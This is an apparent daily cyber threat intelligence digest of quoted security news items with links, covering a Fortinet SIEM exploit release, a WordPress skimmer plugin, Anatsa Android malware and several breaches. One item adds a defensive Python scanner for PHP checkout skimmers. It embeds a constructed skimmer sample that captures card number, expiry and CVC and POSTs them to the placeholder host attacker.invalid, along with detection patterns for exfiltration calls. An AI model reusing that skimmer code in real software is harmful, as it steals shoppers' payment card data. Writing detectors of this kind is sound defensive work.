Cyber Threat Intelligence 29 May 2024
-
Industrial Sector
- Campbell Scientific CSI Web Server
"Successful exploitation of these vulnerabilities could allow an attacker to download files and decode stored passwords."
https://www.cisa.gov/news-events/ics-advisories/icsa-24-149-01
Vulnerabilities
-
Exploit Released For Maximum Severity Fortinet RCE Bug, Patch Now
"Security researchers have released a proof-of-concept (PoC) exploit for a maximum-severity vulnerability in Fortinet's security information and event management (SIEM) solution, which was patched in February. Tracked as CVE-2024-23108, this security flaw is a command injection vulnerability discovered and reported by Horizon3 vulnerability expert Zach Hanley that enables remote command execution as root without requiring authentication."
https://www.bleepingcomputer.com/news/security/exploit-released-for-maximum-severity-fortinet-rce-bug-patch-now/
https://securityaffairs.com/163797/hacking/fortinet-siem-critical-rce-poc.html
-
CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation."
https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-adds-one-known-exploited-vulnerability-catalog
-
Unauthenticated XSS Vulnerability Patched In Slider Revolution Plugin
"Slider Revolution came to us with a request to audit their product for potential vulnerabilities since they wanted to make sure that their users’ websites were not vulnerable to an attack. This blog post discusses our audit findings, which we have been authorized to publicize. If you're a Slider Revolution user, please update the plugin to version 6.7.11 or higher."
https://patchstack.com/articles/unauthenticated-xss-vulnerability-patched-in-slider-revolution-plugin/
https://www.infosecurity-magazine.com/news/xss-flaws-wordpress-plugin-slider/
Malware
-
Server Side Credit Card Skimmer Lodged In Obscure Plugin
"Attackers are always finding new ways to inject malware into websites and new ways to obscure it to avoid detection, but they’re always up to their same old tricks. In this post, we’ll explore how attackers are using a very obscure PHP snippet WordPress plugin to install server-side malware to harvest credit card details from a WooCommerce online store."
https://blog.sucuri.net/2024/05/server-side-credit-card-skimmer-lodged-in-obscure-plugin.html
https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html
https://securityaffairs.com/163777/malware/wordpress-plugin-insert-e-skimmer.html
-
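A practical check to go with this item, as an added example that is not code from the Sucuri write-up and does not reproduce the plugin it analyses: a heuristic scanner for the general shape of a server-side checkout skimmer, PHP that reads card fields out of the request and then stages or sends them somewhere. The indicator patterns are the editor's assumptions about that shape, not Sucuri's detection logic; the two PHP samples, the file names and the attacker.invalid host are constructed for the demo.

```python
"""Heuristic scan for server-side checkout skimmers hidden in PHP (plugin files or
stored code snippets). Added example, not code from the Sucuri write-up; the
indicators are the editor's assumptions about a skimmer's general shape: code that
reads card fields from the request AND stages or sends them out. Samples are
constructed for the demo."""
import os
import re
import sys
from dataclasses import dataclass

# (1) Request parameters a skimmer must read to capture card data.
CARD_FIELD_RE = re.compile(
    r"\$_(?:POST|REQUEST|GET)\s*\[\s*['\"][^'\"]*(?:card|cc[_-]?num|cvv|cvc|expir)[^'\"]*['\"]\s*\]",
    re.IGNORECASE,
)
# (2) Channels by which captured data leaves the server or is staged for pickup.
EXFIL_PATTERNS = {
    "file_write": re.compile(r"\b(?:file_put_contents|fwrite|fputs)\s*\(", re.I),
    "http_out": re.compile(
        r"\b(?:curl_exec|curl_init|wp_remote_post|wp_remote_get|fsockopen)\s*\("
        r"|\bfile_get_contents\s*\(\s*['\"]https?://", re.I),
    "mail": re.compile(r"\b(?:mail|wp_mail)\s*\(", re.I),
}
# Context only: hooks that run while WooCommerce checkout data is in flight, and
# obfuscation that stops the snippet from reading as a skimmer.
CHECKOUT_HOOK_RE = re.compile(
    r"add_(?:action|filter)\s*\(\s*['\"]woocommerce_(?:checkout|after_checkout|payment|order)\w*['\"]", re.I)
OBFUSCATION_RE = re.compile(r"\b(?:base64_decode|gzinflate|str_rot13|eval)\s*\(", re.I)


@dataclass
class Finding:
    path: str
    reads_card_fields: bool
    exfil_channels: list
    checkout_hook: bool
    obfuscation: bool

    @property
    def suspicious(self) -> bool:
        # Reading card fields AND moving them somewhere is the core skimmer shape.
        # A checkout hook or obfuscation on its own is not enough to flag.
        return self.reads_card_fields and bool(self.exfil_channels)


def scan_php_source(path: str, src: str) -> Finding:
    """Classify one PHP source text (a plugin file or a snippet pulled from the DB)."""
    return Finding(
        path=path,
        reads_card_fields=bool(CARD_FIELD_RE.search(src)),
        exfil_channels=[name for name, rx in EXFIL_PATTERNS.items() if rx.search(src)],
        checkout_hook=bool(CHECKOUT_HOOK_RE.search(src)),
        obfuscation=bool(OBFUSCATION_RE.search(src)),
    )


def scan_tree(root: str) -> list:
    """Walk a WordPress install and return only the suspicious .php files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    finding = scan_php_source(path, fh.read())
                if finding.suspicious:
                    hits.append(finding)
    return hits


# Constructed benign sample: a legitimate custom checkout field. It uses a checkout
# hook and $_POST, but never card fields, and nothing leaves the server.
BENIGN_SNIPPET = r'''<?php
add_action('woocommerce_checkout_update_order_meta', 'save_gift_message');
function save_gift_message($order_id) {
    if (!empty($_POST['gift_message'])) {
        update_post_meta($order_id, '_gift_message', sanitize_text_field($_POST['gift_message']));
    }
}
'''
# Constructed skimmer sample: reads card fields during checkout, stages them
# base64-encoded in a dotfile and POSTs them to a placeholder attacker host.
SKIMMER_SNIPPET = r'''<?php
add_action('woocommerce_checkout_process', 'wc_cache_sync');
function wc_cache_sync() {
    $d = array(
        'n' => $_POST['billing_first_name'] . ' ' . $_POST['billing_last_name'],
        'c' => $_POST['card_number'], 'e' => $_POST['card-expiry'], 'v' => $_POST['card_cvc'],
    );
    file_put_contents(__DIR__ . '/.cache.log', base64_encode(json_encode($d)) . "\n", FILE_APPEND);
    $ch = curl_init('https://attacker.invalid/collect');
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d));
    curl_exec($ch);
}
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:  # real use: python skimscan.py /var/www/html
        for f in scan_tree(sys.argv[1]):
            print(f"SUSPICIOUS {f.path}: exfil={f.exfil_channels} hook={f.checkout_hook}")
    else:  # demo on the constructed samples
        for name, src in (("benign.php", BENIGN_SNIPPET), ("skimmer.php", SKIMMER_SNIPPET)):
            print(name, scan_php_source(name, src))
```

Point it at the web root to scan plugin and theme files on disk, and separately feed `scan_php_source` the code that snippet plugins store in the database, since that code commonly never exists as a .php file and a filesystem scan alone will miss it. Treat hits as leads for manual review: the pattern set is deliberately narrow, so a skimmer that reads card data through a different path (for example from an order object rather than `$_POST`) will not be flagged.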
Technical Analysis Of Anatsa Campaigns: An Android Banking Malware Active In The Google Play Store
"At Zscaler ThreatLabz, we regularly monitor the Google Play store for malicious applications. Over the past few months, we identified and analyzed more than 90 malicious applications uploaded to the Google Play store. These malware-infected applications have collectively garnered over 5.5 million installs."
https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-google
https://www.bleepingcomputer.com/news/security/over-90-malicious-android-apps-with-55m-installs-found-on-google-play/
https://www.darkreading.com/endpoint-security/90-malicious-apps-55-million-downloads-google-play
https://www.infosecurity-magazine.com/news/teabot-banking-trojan-activity/
-
Moonstone Sleet Emerges As New North Korean Threat Actor With New Bag Of Tricks
"Microsoft has identified a new North Korean threat actor, now tracked as Moonstone Sleet (formerly Storm-1789), that uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies to target companies for its financial and cyberespionage objectives. Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a malicious game, and deliver a new custom ransomware."
https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
https://www.bleepingcomputer.com/news/microsoft/microsoft-links-moonstone-sleet-north-korean-hackers-to-new-fakepenny-ransomware/
https://www.bankinfosecurity.com/microsoft-warns-north-koreas-moonstone-sleet-a-25344
-
Threats That Hide In Your Microsoft Office Documents
"Microsoft Office documents in the Office365 software suite have become a mainstay for many users who need to create documents for business reports, college essays, resumes, essential notetaking, and even strategic analyses. Office documents offer a wide range of not only text but data editing software solutions that include technologies that introduce algorithmic logic via a macro or, more recently, with the integration of Python scripting being added to Excel for a more dynamic and logical way of interpreting, editing, and displaying data."
https://cofense.com/blog/threats-that-hide-in-your-microsoft-office-documents/
-
CatDDoS-Related Gangs Have Seen a Recent Surge In Activity
"XLab's CTIA (Cyber Threat Insight Analysis) System continuously tracks and monitors the active mainstream DDoS botnets. Recently, our system has observed that CatDDoS-related gangs remain active and have exploited over 80 vulnerabilities over the last three months. Additionally, the maximum number of targets has been observed to exceed 300+ per day. So we decided to share some recent data with the community for reference."
https://blog.xlab.qianxin.com/catddos-derivative-en/
https://thehackernews.com/2024/05/researchers-warn-of-catddos-botnet-and.html
https://www.darkreading.com/cyberattacks-data-breaches/catddos-threat-groups-sharply-ramp-up-ddos-attacks
-
Breach Forums Return To Clearnet And Dark Web Despite FBI Seizure
"Breach Forums returns to the clearnet and dark web just two weeks after the FBI seized its infrastructure and arrested two administrators. One of the admins, ShinyHunters, regained domains despite the FBI’s efforts, highlighting significant operational setbacks and security lapses."
https://www.hackread.com/breach-forums-return-clearnet-dark-web-fbi-seizure/
https://www.theregister.com/2024/05/28/breachforums_back_online/
-
Trusted Relationship Attacks: Trust, But Verify
"The IT outsourcing market continues to demonstrate strong growth globally – such services are becoming increasingly popular. But along with the advantages, such as saved time and resources, delegating non-core tasks creates new challenges in terms of information security. By providing third-party companies (service providers or contractors) with access to their infrastructure, businesses increase the risk of trusted relationship attacks – T1199 in the MITRE ATT&CK classification."
https://securelist.com/trusted-relationship-attack/112731/
-
From Origins To Operations: Understanding Black Basta Ransomware
"Since its emergence in 2022, Black Basta has targeted over 500 organizations worldwide, leveraging sophisticated tactics to become a leading ransomware threat. Here’s a look at their methods of operation, notable attacks, and the potential future of this formidable cybercriminal group."
https://flashpoint.io/blog/understanding-black-basta-ransomware/
-
SharpPanda APT Targets Malaysia With Backdoor Malware
"In a recent analysis conducted in March and April 2024, the NetbyteSEC Detecx (NBS) team exposed a sophisticated malware campaign orchestrated by the notorious SharpPanda APT group, specifically aimed at targets in Malaysia. The malicious executable, disguised as a harmless Microsoft Word document titled “REKOD MINIT KSN KEPADA YAB PM 2023 – 15.exe,” was designed to establish a backdoor connection, granting attackers unauthorized access to compromised systems."
https://securityonline.info/sharppanda-apt-targets-malaysia-with-backdoor-malware/
https://notes.netbytesec.com/2024/05/inside-sharppandas-malware-targeting.html
Breaches/Hacks/Leaks
-
First American December Data Breach Impacts 44,000 People
"First American Financial Corporation, the second-largest title insurance company in the United States, revealed Tuesday that a December cyberattack led to a breach impacting 44,000 individuals. Founded in 1889, it provides financial and settlement services to real estate professionals, home buyers, and sellers involved in residential and commercial property transactions. The California-based company has over 21,000 employees and reported a total revenue of $6 billion last year."
https://www.bleepingcomputer.com/news/security/first-american-december-data-breach-impacts-44-000-people/
-
Hackers Claim Ticketmaster Data Breach: 560M Users’ Info For Sale At $500K
"ShinyHunters hacking group has claimed to have breached Ticketmaster, stealing the personal data of 560 million users. The 1.3 TB of stolen data also includes payment details. Learn more about this major cybersecurity incident and its implications."
https://www.hackread.com/hackers-ticketmaster-data-breach-560m-users-sale/
-
ABN Amro Client Data Possibly Stolen In AddComm Ransomware Attack
"Dutch bank ABN Amro says client data may have been compromised in a ransomware attack at third-party services provider AddComm. The third-party provider announced that the incident has been contained and that the attackers no longer have access to its systems, which have since been restored, but could not confirm what type of data may have been stolen during the attack."
https://www.securityweek.com/abn-amro-client-data-possibly-stolen-in-addcomm-ransomware-attack/
-
Ransomware Attack On Seattle Public Library Knocks Out Online Systems
"A ransomware attack on the Seattle Public Library has brought services to a halt — knocking out the wireless network, computers for staff and patrons, and the entire online catalog. The incident began on Saturday, the organization said in a statement on Monday afternoon. The library has 27 different branches serving nearly 800,000 residents."
https://therecord.media/ransomware-attack-seattle-knocks-out
-
Major Russian Delivery Company Down For Three Days Due To Cyberattack
"A little-known hacker group claimed responsibility for an attack that has disrupted service for days at CDEK, one of Russia’s largest delivery companies. The Russian-speaking hackers, who call themselves Head Mare, said they encrypted the company’s servers with ransomware and destroyed backup copies of its corporate systems."
https://therecord.media/russian-delivery-company-cdek-down-cyberattack
-
Christie’s Confirms Breach After RansomHub Threatens To Leak Data
"Christie's confirmed that it suffered a security incident earlier this month after the RansomHub extortion gang claimed responsibility and threatened to leak stolen data. Christie's is a prominent auction house with a history spanning 2.5 centuries. It operates in 46 countries and specializes in selling art, luxury items, and high-valued collectibles."
https://www.bleepingcomputer.com/news/security/christies-confirms-breach-after-ransomhub-threatens-to-leak-data/
https://therecord.media/christies-cyberattack-ransomhub-claims
https://www.securityweek.com/christies-confirms-data-breach-after-ransomware-group-claims-attack/
https://securityaffairs.com/163808/cyber-crime/christie-data-breach.html
https://www.nytimes.com/2024/05/27/arts/design/hackers-claim-christies-attack.html
https://www.theregister.com/2024/05/28/christies_confirms_cybercriminals_stole_client/
General News
-
The Evolution Of Security Metrics For NIST CSF 2.0
"CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes."
https://www.helpnetsecurity.com/2024/05/28/cisos-security-metrics-nist-csf-2-0/
-
How To Combat Alert Fatigue In Cybersecurity
"In this Help Net Security interview, Ken Gramley, CEO at Stamus Networks, discusses the primary causes of alert fatigue in cybersecurity and DevOps environments. Alert fatigue results from the overwhelming volume of event data generated by security tools, the prevalence of false positives, and the lack of clear event prioritization and actionable guidance."
https://www.helpnetsecurity.com/2024/05/28/ken-gramley-stamus-networks-alert-fatigue/
-
Widespread Data Silos Slow Down Security Response Times
"Although the goals and challenges of IT and security professionals intersect, 72% report security data and IT data are siloed in their organization, which contributes to corporate misalignment and elevated security risk, according to Ivanti."
https://www.helpnetsecurity.com/2024/05/28/data-silos-problem-for-organizations/
-
34% Of Organizations Lack Cloud Cybersecurity Skills
"Incident response today is too time consuming and manual, leaving organizations vulnerable to damage due to their inability to efficiently investigate and respond to identified threats, according to Cado Security."
https://www.helpnetsecurity.com/2024/05/28/cloud-visibility-challenges/
-
#Infosec2024: Why Human Risk Management Is Cybersecurity's Next Step For Awareness
"Amid frequent warnings about the advanced capabilities of cyber threat actors, targeting human frailties remains the primary initial access method for attackers. This reality has led to the development of human risk management (HRM), a concept that places a focus on targeted, intelligence-led interventions to improve security behaviors."
https://www.infosecurity-magazine.com/news/human-risk-management/
-
Take Two APIs And Call Me In The Morning: How Healthcare Research Can Cure Cyber Crime
"Some ideas work better than others. Take DARPA, the US Defense Advanced Research Projects Agency. Launched by US President Dwight Eisenhower in 1957 in response to Sputnik, its job is to create and test concepts that may be useful in thwarting enemies. Along the way, it's helped make happen GPS, weather satellites, PC technology, and something called the internet."
https://www.theregister.com/2024/05/28/take_two_apis_and_call/
-
US Govt Sanctions Cybercrime Gang Behind Massive 911 S5 Botnet
"The U.S. Treasury Department has sanctioned a cybercrime network comprising three Chinese nationals and three Thailand-based companies linked to a massive botnet controlling a residential proxy service known as "911 S5." Researchers at the Canadian University of Sherbrooke revealed almost two years ago, in June 2022, that this illegitimate residential proxy service lured potential victims by offering free VPN services to install malware designed to add their IP addresses to the 911 S5 botnet."
https://www.bleepingcomputer.com/news/security/us-govt-sanctions-cybercrime-gang-behind-massive-911-s5-proxy-botnet-linked-to-illegitimate-residential-proxy-service/
https://home.treasury.gov/news/press-releases/jy2375
https://therecord.media/us-sanctions-chinese-botnet-proxy
https://www.bankinfosecurity.com/us-sanctions-chinese-national-for-running-911-s5-botnet-a-25340
-
Russian Indicted For Selling Access To US Corporate Networks
"A 31-year-old Russian national named Evgeniy Doroshenko has been indicted for wire and computer fraud in the United States for allegedly acting as an "initial access broker" from February 2019 to May 2024. An initial access broker (IAB) is a threat actor who breaches corporate networks and then sells that access to other threat actors, who commonly use the access to conduct data theft or ransomware attacks."
https://www.bleepingcomputer.com/news/security/russian-indicted-for-selling-access-to-us-corporate-networks/
-
From Phish To Phish Phishing: How Email Scams Got Smart
"If only things were this easy. There’s never been a time where phishing was good, but there was certainly a time where phishing seemed quaint. Back in the 1990s, and even up until the last few years, phishing as a concept was marked more by comical errors than it was by pure evil. We’ve seen them all. The ALL CAPS subject lines. The grammar, or lack thereof. The horrible spoof jobs. You may have gotten these emails in the 1990s. You may have gotten these emails in the last few months."
https://blog.checkpoint.com/security/from-phish-to-phish-phishing-how-email-scams-got-smart/
-
The SEC's New Take On Cybersecurity Risk Management
"The advent of generative AI is surfacing new risks, significantly raising the stakes for businesses around the globe and for marketplace stability. In reaction to the logarithmic growth of cybercrime, the guidance and regulatory landscape is changing rapidly. While historically, the United States preferred frameworks over regulation, in 2023 there was a significant regulatory development: the introduction of new cybersecurity rules by the Securities and Exchange Commission (SEC)."
https://www.darkreading.com/cyberattacks-data-breaches/secs-new-take-on-cybersecurity-risk-management
-
Social Distortion: The Threat Of Fear, Uncertainty And Deception In Creating Security Risk
"In offensive security, there are a range of organization specific vulnerabilities that create risk, from software/hardware vulnerabilities, to processes and people. Attackers target and prey on any weakness they can identify. While Red Teams can expose and root out organization specific weaknesses, there is another growing class of vulnerability at an industry level. It’s not a single actor, vulnerability or intentionally malicious campaign. It manifests from governmental requirements and policy interference, to overblown, sometimes false alarms about technology safety, to active efforts to undermine research or authoritative industry voices."
https://www.securityweek.com/social-distortion-the-threat-of-fear-uncertainty-and-deception-in-creating-security-risk/
-
Indian National Pleads Guilty To Wire Fraud Conspiracy For Stealing Over $37 Million By Spoofing Coinbase's Website
"Chirag Tomar, 30, a citizen of the Republic of India, appeared before U.S. Magistrate Judge Susan C. Rodriguez today and pleaded guilty to federal charges for stealing more than $37 million through a spoofing scheme of the Coinbase website, announced Dena J. King, U.S. Attorney for the Western District of North Carolina. Tomar was arrested at the Atlanta airport on Dec. 20, 2023, upon entering the United States, and remains in federal custody."
https://www.justice.gov/usao-wdnc/pr/indian-national-pleads-guilty-wire-fraud-conspiracy-stealing-over-37-million-spoofing
https://www.bleepingcomputer.com/news/security/indian-man-stole-37-million-in-crypto-using-fake-coinbase-pro-site/
https://thehackernews.com/2024/05/indian-national-pleads-guilty-to-37.html
Reference
Electronic Transactions Development Agency (ETDA)